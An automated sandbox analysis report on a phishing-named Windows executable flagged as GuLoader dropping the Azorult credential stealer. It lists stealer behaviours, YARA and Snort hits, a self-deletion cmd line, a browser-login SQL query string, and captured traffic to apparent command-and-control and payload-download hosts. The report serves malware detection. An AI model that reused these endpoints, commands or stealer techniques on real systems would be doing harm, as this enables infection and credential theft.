Edit tour

Windows Analysis Report
Swift Mesaj#U0131#09971.exe

Overview

General Information

Sample Name:	Swift Mesaj#U0131#09971.exe
Analysis ID:	755179
MD5:	310df09294b852bab67e158d95788150
SHA1:	9b69175fcbcc718212d21a77d39969309e9787f8
SHA256:	d27bf1156e1a463ebada17bac3b3a314835cead7e75c4770c95ff21f06e00310
Infos:

Detection

Azorult, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Self deletion via cmd or bat file

Tries to harvest and steal ftp login credentials

Tries to harvest and steal Bitcoin Wallet information

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Instant Messenger accounts or passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Queries information about the installed CPU (vendor, model number etc)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

Swift Mesaj#U0131#09971.exe (PID: 7596 cmdline: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe MD5: 310DF09294B852BAB67E158D95788150)

Swift Mesaj#U0131#09971.exe (PID: 3172 cmdline: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe MD5: 310DF09294B852BAB67E158D95788150)

cmd.exe (PID: 6040 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

timeout.exe (PID: 8964 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.8040635695.000000001D9B8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000000.7688018397.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000001.00000002.7934819719.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000004.00000003.8040702551.000000001D9BC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x37c6f7:$string1: SELECT origin_url, username_value, password_value FROM logins 0x37d628:$string1: SELECT origin_url, username_value, password_value FROM logins 0x1eceb2:$string2: API call with %s database connection pointer 0x1edae6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x381861:$string1: SELECT origin_url, username_value, password_value FROM logins 0x382792:$string1: SELECT origin_url, username_value, password_value FROM logins 0x1f201c:$string2: API call with %s database connection pointer 0x1f2c50:$string3: os_win.c:%d: (%lu) %s(%s) - %s
4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x387450:$string1: SELECT origin_url, username_value, password_value FROM logins 0x388381:$string1: SELECT origin_url, username_value, password_value FROM logins 0x1f7c0b:$string2: API call with %s database connection pointer 0x1f883f:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Click to see the 1 entries

Snort Signatures

ET TROJAN AZORult v3.3 Server Response M2 - Source IP: 172.67.203.65 - Destination IP: 192.168.11.20

Timestamp:	172.67.203.65192.168.11.2080498362029137 11/28/22-12:46:57.711672
SID:	2029137
Source Port:	80
Destination Port:	49836
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/AZORult V3.3 Client Checkin M15 - Source IP: 192.168.11.20 - Destination IP: 172.67.203.65

Timestamp:	192.168.11.20172.67.203.6549836802029468 11/28/22-12:46:56.779159
SID:	2029468
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 113Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`

Source: unknown

DNS traffic detected: queries for: aapancart.com

Source: global traffic

HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49834 version: TLS 1.2

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405425

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Source: Swift Mesaj#U0131#09971.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403373

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_00404C62	1_2_00404C62
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_00406ADD	1_2_00406ADD
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_004072B4	1_2_004072B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B0FF3F	1_2_02B0FF3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF39D5	1_2_02AF39D5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF06AF	1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B11EDB	1_2_02B11EDB
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6A22	1_2_02AF6A22
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0A0F	1_2_02AF0A0F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0A0C	1_2_02AF0A0C
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6E04	1_2_02AF6E04
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF2202	1_2_02AF2202
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0212	1_2_02AF0212
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF7A75	1_2_02AF7A75
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0A53	1_2_02AF0A53
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF4FB7	1_2_02AF4FB7
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF07B4	1_2_02AF07B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF03EB	1_2_02AF03EB
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AFBBF9	1_2_02AFBBF9
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8BF1	1_2_02AF8BF1
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF032A	1_2_02AF032A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6B3F	1_2_02AF6B3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0372	1_2_02AF0372
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF074A	1_2_02AF074A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF00B6	1_2_02AF00B6
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AFC4B4	1_2_02AFC4B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF688B	1_2_02AF688B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF048A	1_2_02AF048A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8890	1_2_02AF8890
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF20F8	1_2_02AF20F8
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF08C2	1_2_02AF08C2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF04DD	1_2_02AF04DD
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF80D4	1_2_02AF80D4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF80D2	1_2_02AF80D2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF74D0	1_2_02AF74D0
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF042A	1_2_02AF042A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF700F	1_2_02AF700F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF000B	1_2_02AF000B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6C0B	1_2_02AF6C0B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0002	1_2_02AF0002
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6C7E	1_2_02AF6C7E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF087A	1_2_02AF087A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8878	1_2_02AF8878
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8C78	1_2_02AF8C78
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B1345E	1_2_02B1345E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B129AC	1_2_02B129AC
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF2187	1_2_02AF2187
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8983	1_2_02AF8983
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B10181	1_2_02B10181
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF05EA	1_2_02AF05EA
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF89FA	1_2_02AF89FA
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF8DC6	1_2_02AF8DC6
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF05D2	1_2_02AF05D2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF892E	1_2_02AF892E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF692A	1_2_02AF692A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6927	1_2_02AF6927
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0122	1_2_02AF0122
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF0938	1_2_02AF0938
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF051F	1_2_02AF051F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF211E	1_2_02AF211E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B1210E	1_2_02B1210E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF757E	1_2_02AF757E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF2140	1_2_02AF2140
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 4_2_01684A99	4_2_01684A99

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B146D7 NtProtectVirtualMemory,		1_2_02B146D7
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B15868 NtResumeThread,		1_2_02B15868

Source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found

Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964990945.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015075705.000000001D464000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987008873.000000001DD28000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7972720642.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973542131.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8061396771.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
